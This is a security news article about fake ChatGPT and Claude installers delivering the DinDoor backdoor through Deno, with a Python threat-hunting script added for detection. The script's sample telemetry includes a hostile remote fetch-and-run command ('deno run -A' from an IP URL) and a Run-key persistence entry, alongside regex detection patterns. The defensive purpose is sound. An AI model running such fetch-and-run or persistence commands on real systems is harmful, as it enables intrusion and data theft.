Cybercriminals Exploit Fake ChatGPT and Claude Installers to Deploy DinDoor Backdoor
In an ongoing campaign, threat actors are distributing a backdoor known as DinDoor by disguising it as installers for popular AI tools such as ChatGPT and Claude. The lure targets content creators, gamers, and AI enthusiasts, and relies on the trust users place in these widely used applications.
Distribution Channels and Tactics
The attackers host their malicious files on reputable platforms such as GitHub and SourceForge. By creating repositories and project pages that appear to offer genuine software, they borrow the credibility of these platforms to persuade users to download and execute the payload. Compromised YouTube channels are used to drive traffic to these repositories: videos on those channels, some with more than 50,000 views, link to the fake installers and significantly extend the campaign's reach.
Technical Breakdown of the Attack
The infection process begins when a user visits a malicious repository and executes a command in their terminal, believing they are installing legitimate software. This command downloads an MSI installer file, which, when executed, initiates a sequence of events leading to the deployment of the DinDoor backdoor.
The MSI file drops a CMD file and a PowerShell script onto the victim's machine. The PowerShell script installs the Deno JavaScript runtime through Windows package managers such as Scoop and WinGet. Because Deno is a legitimate, widely used developer tool installed by legitimate tooling, the activity looks routine and is less likely to be flagged by security controls. Once Deno is installed, it is used to fetch and run the DinDoor backdoor directly from the attacker's server, so the core payload is pulled at run time rather than shipped inside the installer.
DinDoor establishes persistence by creating a Windows registry Run key, so that it executes at each logon. It then communicates with a command-and-control (C2) server, which allows the attacker to deploy additional payloads and exfiltrate sensitive information from the compromised system.
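The infection chain above (installer spawns a script host, script host installs Deno via a package manager, Deno runs a script from a remote URL, a Run key re-launches Deno at logon) lends itself to a simple hunt. The following is an added example written for this page, not code from the original article or from any vendor report; the telemetry is constructed to resemble Sysmon-style process-creation (event 1) and registry-value-set (event 13) records, and the hostnames, paths, SID, command-line switches and URL in it are hypothetical. It flags each stage independently and then counts how many distinct stages were seen per host, because one stage alone (a developer running Deno) is normal while all four together are not.

```python
"""
Hunt for a DinDoor-style infection chain in process and registry telemetry.
Added example for this page; all sample data below is constructed.
"""
import re

# Rule inputs (assumptions about the tooling involved, not taken from the article)
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe")
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PKG_MGR_INSTALLS_DENO = re.compile(r"\b(winget|scoop)\b.*\binstall\b.*\bdeno\b", re.IGNORECASE)

# Constructed sample telemetry: hypothetical hosts, users, paths, SID and URL.
SAMPLE_EVENTS = [
    {"host": "WS-ALICE", "id": 1, "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\setup.cmd"'},
    {"host": "WS-ALICE", "id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\alice\AppData\Local\Temp\install.ps1"},
    {"host": "WS-ALICE", "id": 1,
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\winget.exe",
     "cmdline": "winget install --id DenoLand.Deno --accept-package-agreements"},
    {"host": "WS-ALICE", "id": 1,
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\.deno\bin\deno.exe",
     "cmdline": "deno run -A https://203.0.113.10/loader.js"},
    {"host": "WS-ALICE", "id": 13, "image": r"C:\Users\alice\.deno\bin\deno.exe",
     "target": r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r'"C:\Users\alice\.deno\bin\deno.exe" run -A https://203.0.113.10/loader.js'},
    # Benign developer activity on another host: must not fire any rule.
    {"host": "WS-BOB", "id": 1, "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Users\bob\.deno\bin\deno.exe",
     "cmdline": "deno run --allow-net main.ts"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_installer_spawns_script_host(ev: dict) -> bool:
    """Stage 1: msiexec spawning cmd/powershell, or a .cmd launching a .ps1 via -File."""
    if ev.get("id") != 1:
        return False
    parent, image = basename(ev.get("parent", "")), basename(ev.get("image", ""))
    if parent == "msiexec.exe" and image in SCRIPT_HOSTS:
        return True
    return parent == "cmd.exe" and image in ("powershell.exe", "pwsh.exe") \
        and "-file" in ev.get("cmdline", "").lower()


def rule_script_host_installs_deno(ev: dict) -> bool:
    """Stage 2: a script host driving WinGet/Scoop to install Deno."""
    if ev.get("id") != 1:
        return False
    return basename(ev.get("parent", "")) in SCRIPT_HOSTS \
        and PKG_MGR_INSTALLS_DENO.search(ev.get("cmdline", "")) is not None


def rule_deno_runs_remote_script(ev: dict) -> bool:
    """Stage 3: deno run with an http(s) URL as the script to execute."""
    if ev.get("id") != 1 or basename(ev.get("image", "")) != "deno.exe":
        return False
    cmd = ev.get("cmdline", "")
    return re.search(r"\brun\b", cmd) is not None and REMOTE_URL.search(cmd) is not None


def rule_run_key_launches_deno(ev: dict) -> bool:
    """Stage 4: a Run/RunOnce value whose data invokes Deno."""
    if ev.get("id") != 13 or not RUN_KEY.search(ev.get("target", "")):
        return False
    return "deno" in ev.get("details", "").lower()


RULES = {
    "installer_spawns_script_host": rule_installer_spawns_script_host,
    "script_host_installs_deno": rule_script_host_installs_deno,
    "deno_runs_remote_script": rule_deno_runs_remote_script,
    "run_key_launches_deno": rule_run_key_launches_deno,
}


def hunt(events: list) -> list:
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def chain_stages(events: list) -> dict:
    """Map host -> set of distinct stages observed; hosts with no hits are omitted."""
    stages = {}
    for i, name in hunt(events):
        stages.setdefault(events[i].get("host", "?"), set()).add(name)
    return stages


if __name__ == "__main__":
    for idx, rule_name in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}")
    for host, seen in chain_stages(SAMPLE_EVENTS).items():
        print(f"{host}: {len(seen)}/{len(RULES)} stages of the chain observed")
```

Each rule on its own will produce noise on developer workstations (WinGet installs of Deno, `deno run` against a trusted remote module); the per-host stage count is what separates this chain from ordinary use, so alert on three or more stages and treat a single `run_key_launches_deno` hit as worth a manual look.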
Capabilities of DinDoor Backdoor
Once active, DinDoor provides the attacker with extensive control over the infected system. Its capabilities include:
– Data Theft: Extracting information from web browsers and cryptocurrency wallets.
– Surveillance: Capturing screenshots and recording clipboard activity.
– Espionage: Utilizing the Microsoft Edge browser to initiate a hidden video stream, effectively spying on the victim’s activities.
Broader Implications and Related Threats
This campaign is part of a larger trend where cybercriminals exploit the popularity of AI tools to distribute malware. Similar tactics have been observed in previous incidents:
– Malicious Chrome AI Extensions: Over 260,000 users were affected by fake AI extensions that injected remote-controlled iframes, turning browser add-ons into surveillance tools. ([cybersecuritynews.com](https://cybersecuritynews.com/chrome-ai-extensions-attacking-users/?utm_source=openai))
– Fake AI Tool Impersonation: Hackers created counterfeit versions of AI platforms like Kling AI to deliver malware, targeting millions of users. ([cybersecuritynews.com](https://cybersecuritynews.com/hackers-created-fake-version-of-ai-tool/?utm_source=openai))
– Malicious PyPi Packages: Developers were targeted with packages mimicking ChatGPT and Claude, which distributed modified versions of malware. ([cybersecuritynews.com](https://cybersecuritynews.com/malicious-pypi-package-mimic-chatgpt-claude/?utm_source=openai))
Recommendations for Users
To mitigate the risk of such attacks, users are advised to:
1. Download Software from Official Sources: Always obtain software directly from the official websites or trusted app stores.
2. Verify Authenticity: Be cautious of software promoted through unofficial channels or unfamiliar platforms.
3. Exercise Caution with Commands: Do not paste commands from unverified sources into your terminal or command prompt, especially one-liners that download and execute a script in a single step.
4. Maintain Updated Security Software: Ensure that your antivirus and anti-malware programs are up to date to detect and prevent such threats.
5. Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by attackers to recognize and avoid potential risks.
By adhering to these practices, users can significantly reduce their vulnerability to malware campaigns that exploit the trust associated with popular AI tools.